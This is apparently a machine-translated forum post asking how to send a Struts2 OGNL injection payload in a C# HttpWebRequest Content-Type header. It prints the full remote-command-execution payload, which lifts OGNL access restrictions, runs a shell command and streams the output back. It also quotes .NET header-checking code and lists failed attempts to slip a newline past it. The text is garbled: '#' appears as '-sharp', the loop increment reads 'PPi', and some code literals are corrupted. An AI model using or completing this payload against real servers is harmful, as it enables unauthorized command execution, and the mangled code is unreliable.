Hello, bosses!
at the request of a friend, help him test a web vulnerability.
after writing and running a HTTP GET, which he thought was very simple, he found that he could not achieve the desired effect in any case
HttpWebRequest
url =xxx,
method =get,
content-type="%{(-sharp_="multipart/form-data").(-sharpdm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(-sharp_memberAccess?(-sharp_memberAccess=-sharpdm):((-sharpcontainer=-sharpcontext["com.opensymphony.xwork2.ActionContext.container"]).(-sharpognlUtil=-sharpcontainer.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(-sharpognlUtil.getExcludedPackageNames().clear()).(-sharpognlUtil.getExcludedClasses().clear()).(-sharpcontext.setMemberAccess(-sharpdm)))).(-sharpcmd="whoami").(-sharpiswin=(@java.lang.System@getProperty("os.name").toLowerCase().contains("win"))).(-sharpcmds=(-sharpiswin?{"cmd.exe","/c",-sharpcmd}:{"/bin/bash","-c",-sharpcmd})).(-sharpp=new (here is new line) java.lang.ProcessBuilder(-sharpcmds)).(-sharpp.redirectErrorStream(true)).(-sharpprocess=-sharpp.start()).(-sharpros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(-sharpprocess.getInputStream(),-sharpros)).(-sharpros.flush())}",
KeepAlive =false,
OverTime = 8000 (ms)
after running, I found that the CRLF, problem when assigning a value to header.content-type comes from the spaces and line breaks in the string "P=new Java".
check the stack and officially see that there is a restriction from metadata that there are no spaces or line breaks in the string: https://referencesource.micro.
internal static string CheckBadChars(string name, bool isHeaderValue) {
if (name == null || name.Length == 0) {
// emtpy name is invlaid
if (!isHeaderValue) {
throw name == null ? new ArgumentNullException("name") :
new ArgumentException(SR.GetString(SR.net_emptystringcall, "name"), "name");
}
//empty value is OK
return string.Empty;
}
if (isHeaderValue) {
// VALUE check
//Trim spaces from both ends
name = name.Trim(HttpTrimCharacters);
//First, check for correctly formed multi-line value
//Second, check for absenece of CTL characters
int crlf = 0;
for(int i = 0; i < name.Length; PPi) {
char c = (char) (0x000000ff & (uint) name[i]);
switch (crlf)
{
case 0:
if (c == "\r")
{
crlf = 1;
}
else if (c == "\n")
{
// Technically this is bad HTTP. But it would be a breaking change to throw here.
// Is there an exploit?
crlf = 2;
}
else if (c == 127 || (c < " " && c != "\t"))
{
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidControlChars), "value");
}
break;
case 1:
if (c == "\n")
{
crlf = 2;
break;
}
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidCRLFChars), "value");
case 2:
if (c == " " || c == "\t")
{
crlf = 0;
break;
}
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidCRLFChars), "value");
}
}
if (crlf != 0)
{
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidCRLFChars), "value");
}
}
else {
// NAME check
//First, check for absence of separators and spaces
if (name.IndexOfAny(ValidationHelper.InvalidParamChars) != -1) {
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidHeaderChars), "name");
}
//Second, check for non CTL ASCII-7 characters (32-126)
if (ContainsNonAsciiChars(name)) {
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidNonAsciiChars), "name");
}
}
return name;
}
ask for help from all the bigwigs, because friends have achieved the same GETMurmuri with Python and java!
try the following methods
rn error CRLF
string concatenation does not take effect
u0008 error CRLF
\ n does not take effect
Please do me a favor and give me some suggestions or suggestions. Thank you very much.